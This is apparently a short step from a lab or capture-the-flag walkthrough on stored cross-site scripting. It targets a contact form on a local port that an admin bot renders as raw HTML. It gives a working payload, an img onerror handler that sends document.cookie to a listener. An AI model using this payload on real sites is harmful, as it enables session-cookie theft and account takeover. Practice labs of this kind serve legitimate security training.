In the browser, go to the contact form at http://localhost:$PORT. Fill in any name and email. In the message field, enter the XSS payload pointing to your listener.
Command / Input
<img src=x onerror="fetch('http://localhost:8888/?c='+document.cookie)">
⚑ The admin bot visits the admin panel every 5 seconds and renders all submissions as raw HTML.